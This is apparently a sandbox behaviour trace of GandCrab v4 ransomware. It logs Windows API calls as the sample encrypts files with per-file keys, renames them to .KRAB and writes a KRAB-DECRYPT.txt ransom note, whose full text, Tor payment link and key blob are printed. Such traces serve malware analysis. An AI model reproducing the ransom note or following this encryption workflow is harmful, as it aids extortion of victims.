CryptReleaseContext (hProv=0x1011018, dwFlags=0x0) returned 1 [0089.157] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.157] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x1010e80) returned 1 [0089.159] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0089.159] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0089.160] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0089.160] CryptGenRandom (in: hProv=0x1010e80, dwLen=0x8, pbBuffer=0x338ecec | out: pbBuffer=0x338ecec) returned 1 [0089.160] CryptReleaseContext (hProv=0x1010e80, dwFlags=0x0) returned 1 [0089.160] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.160] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x1011898) returned 1 [0089.162] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0x10234f8) returned 1 [0089.162] CryptGetKeyParam (in: hKey=0x10234f8, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0089.162] CryptEncrypt (in: hKey=0x10234f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0089.162] GetLastError () returned 0x0 [0089.162] CryptDestroyKey (hKey=0x10234f8) returned 1 [0089.162] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0089.162] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x10114e0) returned 1 [0089.164] CryptImportKey (in: hProv=0x10114e0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0x1023138) returned 1 [0089.164] CryptGetKeyParam (in: hKey=0x1023138, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0089.164] CryptEncrypt (in: hKey=0x1023138, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0089.164] GetLastError () returned 0x0 [0089.164] CryptDestroyKey (hKey=0x1023138) returned 1 [0089.164] CryptReleaseContext (hProv=0x10114e0, dwFlags=0x0) returned 1 [0089.164] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\PreHK.pps" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\prehk.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x474 [0089.165] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0089.165] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0089.166] ReadFile (in: hFile=0x474, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ecfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ecfc*=0x1061d, lpOverlapped=0x0) returned 1 [0089.339] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffef9e3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.339] WriteFile (in: hFile=0x474, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x1061d, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ecf8*=0x1061d, lpOverlapped=0x0) returned 1 [0089.339] WriteFile (in: hFile=0x474, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ecf8*=0x208, lpOverlapped=0x0) returned 1 [0089.339] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.351] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.352] CloseHandle (hObject=0x474) returned 1 [0089.352] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.352] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\PreHK.pps" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\prehk.pps"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\PreHK.pps.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\prehk.pps.krab")) returned 1 [0089.353] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.353] FindNextFileW (in: hFindFile=0x1022ff8, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0089.353] lstrcmpW (lpString1="rd0j9efZtIGt", lpString2=".") returned 1 [0089.353] lstrcmpW (lpString1="rd0j9efZtIGt", lpString2="..") returned 1 [0089.354] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\", lpString2="rd0j9efZtIGt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt" [0089.354] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\" [0089.354] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0089.354] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0089.354] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0089.354] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0089.354] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0089.354] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.354] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0089.355] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\\\KRAB-DECRYPT.txt") returned 92 [0089.355] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x474 [0089.355] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0089.355] WriteFile (in: hFile=0x474, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338eaa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338eaa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0089.356] CloseHandle (hObject=0x474) returned 1 [0089.356] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.356] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0089.357] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x24, wMilliseconds=0x229)) [0089.357] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0089.357] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0089.357] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0089.357] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\d2ca4a08d2ca4dee3d.lock") returned 98 [0089.357] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x734 [0089.399] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.399] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.400] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\") returned 75 [0089.400] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\*" [0089.400] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\*", lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0x1023238 [0089.400] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.400] FindNextFileW (in: hFindFile=0x1023238, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0089.400] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.400] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.400] FindNextFileW (in: hFindFile=0x1023238, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0089.400] lstrcmpW (lpString1="BO-IIf.rtf", lpString2=".") returned 1 [0089.400] lstrcmpW (lpString1="BO-IIf.rtf", lpString2="..") returned 1 [0089.400] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\", lpString2="BO-IIf.rtf" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\BO-IIf.rtf") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\BO-IIf.rtf" [0089.401] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0089.401] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\BO-IIf.rtf.KRAB") returned 90 [0089.401] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\BO-IIf.rtf") returned 85 [0089.401] lstrlenW (lpString=".rtf") returned 4 [0089.401] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0089.402] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".rtf ") returned 5 [0089.402] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.402] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\BO-IIf.rtf") returned 85 [0089.402] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\BO-IIf.rtf") returned 85 [0089.402] lstrcmpiW (lpString1="BO-IIf.rtf", lpString2="desktop.ini") returned -1 [0089.402] lstrcmpiW (lpString1="BO-IIf.rtf", lpString2="autorun.inf") returned 1 [0089.402] lstrcmpiW (lpString1="BO-IIf.rtf", lpString2="ntuser.dat") returned -1 [0089.402] lstrcmpiW (lpString1="BO-IIf.rtf", lpString2="iconcache.db") returned -1 [0089.402] lstrcmpiW (lpString1="BO-IIf.rtf", lpString2="bootsect.bak") returned -1 [0089.402] lstrcmpiW (lpString1="BO-IIf.rtf", lpString2="boot.ini") returned -1 [0089.402] lstrcmpiW (lpString1="BO-IIf.rtf", lpString2="ntuser.dat.log") returned -1 [0089.402] lstrcmpiW (lpString1="BO-IIf.rtf", lpString2="thumbs.db") returned -1 [0089.402] lstrcmpiW (lpString1="BO-IIf.rtf", lpString2="KRAB-DECRYPT.html") returned -1 [0089.402] lstrcmpiW (lpString1="BO-IIf.rtf", lpString2="KRAB-DECRYPT.txt") returned -1 [0089.402] lstrcmpiW (lpString1="BO-IIf.rtf", lpString2="CRAB-DECRYPT.txt") returned -1 [0089.402] lstrcmpiW (lpString1="BO-IIf.rtf", lpString2="ntldr") returned -1 [0089.402] lstrcmpiW (lpString1="BO-IIf.rtf", lpString2="NTDETECT.COM") returned -1 [0089.402] lstrcmpiW (lpString1="BO-IIf.rtf", lpString2="Bootfont.bin") returned -1 [0089.402] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0089.403] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x10112c0) returned 1 [0089.405] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0089.406] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0089.422] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0089.422] CryptGenRandom (in: hProv=0x10112c0, dwLen=0x20, pbBuffer=0x338ea4c | out: pbBuffer=0x338ea4c) returned 1 [0089.422] CryptReleaseContext (hProv=0x10112c0, dwFlags=0x0) returned 1 [0089.422] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.422] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x10110a0) returned 1 [0089.426] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0089.426] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0089.427] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0089.428] CryptGenRandom (in: hProv=0x10110a0, dwLen=0x8, pbBuffer=0x338ea6c | out: pbBuffer=0x338ea6c) returned 1 [0089.428] CryptReleaseContext (hProv=0x10110a0, dwFlags=0x0) returned 1 [0089.428] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.428] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1011018) returned 1 [0089.434] CryptImportKey (in: hProv=0x1011018, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0x1023278) returned 1 [0089.434] CryptGetKeyParam (in: hKey=0x1023278, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0089.434] CryptEncrypt (in: hKey=0x1023278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0089.436] GetLastError () returned 0x0 [0089.436] CryptDestroyKey (hKey=0x1023278) returned 1 [0089.436] CryptReleaseContext (hProv=0x1011018, dwFlags=0x0) returned 1 [0089.436] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x10113d0) returned 1 [0089.438] CryptImportKey (in: hProv=0x10113d0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0x1023338) returned 1 [0089.438] CryptGetKeyParam (in: hKey=0x1023338, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0089.440] CryptEncrypt (in: hKey=0x1023338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0089.440] GetLastError () returned 0x0 [0089.440] CryptDestroyKey (hKey=0x1023338) returned 1 [0089.440] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0089.440] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\BO-IIf.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\bo-iif.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0089.442] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0089.442] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0089.442] ReadFile (in: hFile=0x43c, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ea7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ea7c*=0x164f4, lpOverlapped=0x0) returned 1 [0089.478] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffe9b0c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.478] WriteFile (in: hFile=0x43c, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x164f4, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ea78*=0x164f4, lpOverlapped=0x0) returned 1 [0089.483] WriteFile (in: hFile=0x43c, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ea78*=0x208, lpOverlapped=0x0) returned 1 [0089.483] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 